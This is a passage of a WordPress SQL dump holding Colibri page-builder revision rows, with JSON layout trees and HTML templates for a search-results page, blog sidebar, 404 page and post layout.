:{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m16\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-pagination\",\"slot\":null,\"parentId\":\"40-m16\",\"index\":0,\"id\":\"40-m17\",\"partialId\":40,\"styleRef\":154,\"type\":\"main\",\"props\":{\"stateType\":\"active\"}}],\"styleRef\":153,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"40-m18\",\"parentId\":\"40-m12\",\"partialId\":40,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"40-m18\",\"index\":0,\"id\":\"40-m19\",\"partialId\":40,\"styleRef\":156,\"type\":\"main\",\"props\":{\"stateType\":\"hover\",\"nextLabel\":\"Next\"}}],\"styleRef\":155,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"40-m1\",\"index\":4,\"id\":\"40-m12\",\"partialId\":40,\"styleRef\":149,\"type\":\"main\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-archive-navigation\",\"slot\":null,\"parentId\":\"40-m21\",\"index\":1,\"id\":\"40-m22\",\"partialId\":40,\"styleRef\":159,\"type\":\"main\"}],\"id\":\"40-m21\",\"parentId\":\"40-m20\",\"partialId\":40,\"styleRef\":158,\"type\":\"main\"}],\"id\":\"40-m20\",\"parentId\":\"40-m1\",\"partialId\":40,\"styleRef\":157,\"type\":\"main\",\"props\":{\"name\":\"Search results\",\"attrs\":{\"id\":\"search-results\"}}}],\"id\":\"40-m1\",\"partialId\":40,\"styleRef\":138,\"type\":\"main\"}','','','inherit','closed','closed','','41-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',41,'https://gsudice.dataconn.net/?p=65',0,'revision','',0),(66,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"40-m1\" class=\"style-138 style-local-40-m1 position-relative\">\n <!---->\n <div data-colibri-id=\"40-m2\" class=\"h-row-container gutters-row-lg-3 gutters-row-md-3 gutters-row-2 gutters-row-v-lg-3 gutters-row-v-md-3 gutters-row-v-3 colibri-dynamic-list style-139 style-local-40-m2 position-relative\">\n <!---->\n <div data-colibri-component=\"\" class=\"h-row justify-content-lg-start justify-content-md-start justify-content-start align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-3 gutters-col-md-3 gutters-col-2 gutters-col-v-lg-3 gutters-col-v-md-3 gutters-col-v-3 style-139-row style-local-40-m2-row\">\n <!---->[colibri_loop query=\"false\"]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-140-outer%20style-local-40-m3-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22639-m3%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-140%20style-local-40-m3%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22639-m4%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-141%20style-local-40-m4%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-142-outer%20style-local-40-m5-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22639-m5%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-142%20style-local-40-m5%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22639-m6%22%20class=%22h-blog-categories%20style-143%20style-local-40-m6%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3Cdiv%20%20%20data-colibri-id=%22639-m7%22%20class=%22h-blog-title%20style-144%20style-local-40-m7%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_title%20heading_type=%22h4%22%20classes=%22colibri-word-wrap%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22639-m8%22%20class=%22h-blog-meta%20style-145%20style-local-40-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%7C%20%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22639-m9%22%20class=%22style-146%20style-local-40-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_excerpt%20max_length=%22%22%5D%3C/div%3E%3C/div%3E%3Cdiv%20%20%20%20data-colibri-id=%22639-m10%22%20class=%22h-x-container%20style-147%20style-local-40-m10%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-x-container-inner%20style-dynamic-40-m10-group%22%3E%3C!----%3E%3Cspan%20%20%20class=%22h-button__outer%20style-148-outer%20style-local-40-m11-outer%20d-inline-flex%20h-element%22%20%20%20%20%3E%3Ca%20%20h-use-smooth-scroll=%22true%22%20href=%22%5Bcolibri_post_link%5D%22%20%20data-colibri-id=%22639-m11%22%20class=%22d-flex%20w-100%20align-items-center%20h-button%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20style-148%20style-local-40-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cspan%20%3Eread%20more%3C/span%3E%20%3Cspan%20%20class=%22h-svg-icon%20h-button__icon%20style-148-icon%20style-local-40-m11-icon%22%3E%3C!--Icon%20by%20Icons8%20Line%20Awesome%20(https://icons8.com/line-awesome)--%3E%3Csvg%20version=%221.1%22%20xmlns=%22http://www.w3.org/2000/svg%22%20xmlns:xlink=%22http://www.w3.org/1999/xlink%22%20id=%22arrow-right%22%20viewBox=%220%200%20512%20545.5%22%3E%3Cpath%20d=%22M299.5%20140.5l136%20136%2011%2011.5-11%2011.5-136%20136-23-23L385%20304H64v-32h321L276.5%20163.5z%22%3E%3C/path%3E%3C/svg%3E%3C/span%3E%3C/a%3E%3C/span%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n </div>\n </div>[colibri_layout_wrapper name=\"navigation_container\"]\n <div data-colibri-id=\"40-m12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-149 style-local-40-m12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col style-150-outer style-local-40-m13-outer\">\n <div data-colibri-id=\"40-m13\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-150 style-local-40-m13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-151-outer style-local-40-m14-outer\">\n <div data-colibri-id=\"40-m14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-151 style-local-40-m14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"40-m15\" class=\"style-152 style-local-40-m15 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"prev\" next_label=\"Next\" prev_label=\"Back\"]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-153-outer style-local-40-m16-outer\">\n <div data-colibri-id=\"40-m16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-153 style-local-40-m16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"40-m17\" class=\"style-154 style-local-40-m17 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_archive_pagination]</div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-155-outer style-local-40-m18-outer\">\n <div data-colibri-id=\"40-m18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-2 v-inner-md-2 v-inner-2 style-155 style-local-40-m18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"40-m19\" class=\"style-156 style-local-40-m19 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all archive-nav-button\">[colibri_archive_nav_button type=\"next\" next_label=\"Next\" prev_label=\"Back\"]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>[/colibri_layout_wrapper]\n <div data-colibri-id=\"40-m20\" id=\"search-results\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-157 style-local-40-m20 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-12 h-col-md-12 h-col-12 style-158-outer style-local-40-m21-outer\">\n <div data-colibri-id=\"40-m21\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-158 style-local-40-m21 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <hop-archive-navigation previewid=\"639-m22\" hmodel=\"[object Object]\" parentmodelobj=\"[object Object]\" rootmodel=\"[object Object]\" ispreview=\"true\" class=\"h-element\"></hop-archive-navigation>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','main_search','','inherit','closed','closed','','40-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',40,'https://gsudice.dataconn.net/?p=66',0,'revision','',0),(67,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-sidebar\",\"id\":\"43-s1\",\"partialId\":43,\"styleRef\":160,\"type\":\"sidebar\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"43-s15\",\"parentId\":\"43-s14\",\"partialId\":43,\"styleRef\":164,\"type\":\"sidebar\"},{\"name\":\"hop-text\",\"id\":\"43-s16\",\"parentId\":\"43-s14\",\"partialId\":43,\"styleRef\":165,\"type\":\"sidebar\"}],\"id\":\"43-s14\",\"parentId\":\"43-s13\",\"partialId\":43,\"styleRef\":163,\"type\":\"sidebar\"}],\"id\":\"43-s13\",\"parentId\":\"43-s2\",\"partialId\":43,\"styleRef\":162,\"type\":\"sidebar\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"43-s4\",\"parentId\":\"43-s3\",\"partialId\":43,\"children\":[{\"name\":\"hop-widget-area\",\"props\":{\"widgetAreaId\":\"sidebar-1\"},\"id\":\"43-s5\",\"parentId\":\"43-s4\",\"partialId\":43,\"children\":[{\"name\":\"hop-search-widget\",\"id\":\"43-s6\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":169,\"type\":\"sidebar\",\"props\":{\"stateButton\":\"\",\"showButton\":true,\"showPlaceholder\":true,\"stateInput\":\"\",\"showIconButton\":true}},{\"name\":\"hop-recent-post-widget\",\"id\":\"43-s7\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":170,\"type\":\"sidebar\"},{\"name\":\"hop-recent-comments-widget\",\"id\":\"43-s8\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":171,\"type\":\"sidebar\"},{\"name\":\"hop-archives-widget\",\"id\":\"43-s9\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":172,\"type\":\"sidebar\"},{\"name\":\"hop-categories-widget\",\"id\":\"43-s10\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":173,\"type\":\"sidebar\"},{\"name\":\"hop-meta-widget\",\"id\":\"43-s11\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":174,\"type\":\"sidebar\"},{\"name\":\"hop-text-widget\",\"id\":\"43-s12\",\"parentId\":\"43-s5\",\"partialId\":43,\"styleRef\":175,\"type\":\"sidebar\"}],\"styleRef\":168,\"type\":\"sidebar\"}],\"styleRef\":167,\"type\":\"sidebar\"}],\"id\":\"43-s3\",\"parentId\":\"43-s2\",\"partialId\":43,\"styleRef\":166,\"type\":\"sidebar\"}],\"parentId\":\"43-s1\",\"type\":\"sidebar\",\"props\":{\"anchor\":false,\"name\":\"Blog Sidebar\",\"attrs\":{\"id\":\"blog-sidebar\"}},\"id\":\"43-s2\",\"partialId\":43,\"styleRef\":161}]}','','','inherit','closed','closed','','44-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',44,'https://gsudice.dataconn.net/?p=67',0,'revision','',0),(68,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"43-s1\" class=\"style-160 style-local-43-s1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"43-s2\" id=\"blog-sidebar\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-161 style-local-43-s2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"43-s3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-166 style-local-43-s3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-167-outer style-local-43-s4-outer\">\n <div data-colibri-id=\"43-s4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-167 style-local-43-s4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"43-s5\" class=\"h-widget-area style-168 style-local-43-s5 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all widget-shortcode\">[colibri_widget_area id=\"sidebar-1\"]</div>\n <div data-colibri-id=\"43-s6\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s7\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s8\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s9\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s10\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s11\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n <div data-colibri-id=\"43-s12\" class=\"position-relative h-element\" style=\"display: none;\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','sidebar_post','','inherit','closed','closed','','43-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',43,'https://gsudice.dataconn.net/?p=68',0,'revision','',0),(75,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"37-m3\",\"index\":0,\"id\":\"37-m4\",\"partialId\":37,\"styleRef\":134,\"type\":\"main\",\"props\":{\"content\":\"404\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"37-m3\",\"index\":1,\"id\":\"37-m5\",\"partialId\":37,\"styleRef\":135,\"type\":\"main\",\"props\":{\"content\":\"<p>Sorry, page not found!<\\/p>\"}},{\"name\":\"hop-home-button-group\",\"children\":[{\"name\":\"hop-home-button\",\"props\":{\"text\":\"Go to Homepage!\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"37-m7\",\"parentId\":\"37-m6\",\"partialId\":37,\"styleRef\":137,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"37-m3\",\"index\":2,\"id\":\"37-m6\",\"partialId\":37,\"styleRef\":136,\"type\":\"main\"}],\"id\":\"37-m3\",\"parentId\":\"37-m2\",\"partialId\":37,\"styleRef\":133,\"type\":\"main\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}}}],\"id\":\"37-m2\",\"parentId\":\"37-m1\",\"partialId\":37,\"styleRef\":132,\"type\":\"main\",\"props\":{\"name\":\"Nothing found\",\"attrs\":{\"id\":\"nothing-found\"}}}],\"id\":\"37-m1\",\"partialId\":37,\"styleRef\":131,\"type\":\"main\"}','','','inherit','closed','closed','','38-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',38,'https://gsudice.dataconn.net/?p=75',0,'revision','',0),(76,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"37-m1\" class=\"style-131 style-local-37-m1 position-relative\">\n <!---->\n <div data-colibri-id=\"37-m2\" id=\"nothing-found\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-132 style-local-37-m2 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col-auto style-133-outer style-local-37-m3-outer\">\n <div data-colibri-id=\"37-m3\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-133 style-local-37-m3 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"37-m4\" class=\"h-global-transition-all h-heading style-134 style-local-37-m4 position-relative h-element\">\n <!---->\n <!---->\n <h2 class=\"\">404</h2>\n </div>\n <div data-colibri-id=\"37-m5\" class=\"h-text h-text-component style-135 style-local-37-m5 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Sorry, page not found!</p>\n </div>\n </div>\n <div data-colibri-id=\"37-m6\" class=\"h-x-container style-136 style-local-37-m6 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-37-m6-group\">\n <!----><span class=\"h-button__outer style-137-outer style-local-37-m7-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"[colibri_home_url]\" data-colibri-id=\"37-m7\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-137 style-local-37-m7 position-relative\"><!----><!----> <span >Go to Homepage!</span> <span class=\"h-svg-icon h-button__icon style-137-icon style-local-37-m7-icon\"><!--Icon by Icons8 Line Awesome (https://icons8.com/line-awesome)-->[colibri_svg_icon name=icons8-line-awesome/arrow-right]</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','main_404','','inherit','closed','closed','','37-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',37,'https://gsudice.dataconn.net/?p=76',0,'revision','',0),(77,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"31-m27\",\"parentId\":\"31-m26\",\"partialId\":31,\"styleRef\":70,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"31-m28\",\"parentId\":\"31-m26\",\"partialId\":31,\"styleRef\":71,\"type\":\"main\"}],\"id\":\"31-m26\",\"parentId\":\"31-m25\",\"partialId\":31,\"styleRef\":69,\"type\":\"main\"}],\"id\":\"31-m25\",\"parentId\":\"31-m2\",\"partialId\":31,\"styleRef\":68,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-post-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-thumbnail\",\"id\":\"31-m5\",\"parentId\":\"31-m4\",\"partialId\":31,\"styleRef\":74,\"type\":\"main\",\"props\":{\"showPlaceholder\":false,\"addLink\":false}},{\"name\":\"hop-row\",\"id\":\"31-m6\",\"parentId\":\"31-m4\",\"partialId\":31,\"styleRef\":75,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"id\":\"31-m7\",\"parentId\":\"31-m6\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-meta\",\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m8\",\"partialId\":31,\"styleRef\":77,\"type\":\"main\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"showIcons\":false,\"separator\":\"\"}},{\"name\":\"hop-post-content\",\"parentId\":\"31-m7\",\"id\":\"31-m9\",\"partialId\":31,\"styleRef\":78,\"type\":\"main\"},{\"name\":\"hop-post-categories-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"31-m11\",\"parentId\":\"31-m10\",\"partialId\":31,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"31-m11\",\"index\":0,\"id\":\"31-m12\",\"partialId\":31,\"styleRef\":81,\"type\":\"main\",\"props\":{\"content\":\"<p>Categories:<\\/p>\"}}],\"styleRef\":80,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"31-m13\",\"parentId\":\"31-m10\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-categories\",\"slot\":null,\"parentId\":\"31-m13\",\"index\":0,\"id\":\"31-m14\",\"partialId\":31,\"styleRef\":83,\"type\":\"main\"}],\"styleRef\":82,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m10\",\"partialId\":31,\"styleRef\":79,\"type\":\"main\"},{\"name\":\"hop-post-tags-container\",\"slot\":null,\"parentId\":\"31-m7\",\"index\":1,\"id\":\"31-m15\",\"partialId\":31,\"styleRef\":84,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"31-m16\",\"parentId\":\"31-m15\",\"partialId\":31,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"31-m16\",\"index\":0,\"id\":\"31-m17\",\"partialId\":31,\"styleRef\":86,\"type\":\"main\",\"props\":{\"content\":\"<p>Tags:<\\/p>\"}}],\"styleRef\":85,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"id\":\"31-m18\",\"parentId\":\"31-m15\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-tags\",\"slot\":null,\"parentId\":\"31-m18\",\"index\":2,\"id\":\"31-m19\",\"partialId\":31,\"styleRef\":88,\"type\":\"main\",\"props\":{\"prefix\":\"\"}}],\"styleRef\":87,\"type\":\"main\"}]}],\"styleRef\":76,\"type\":\"main\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\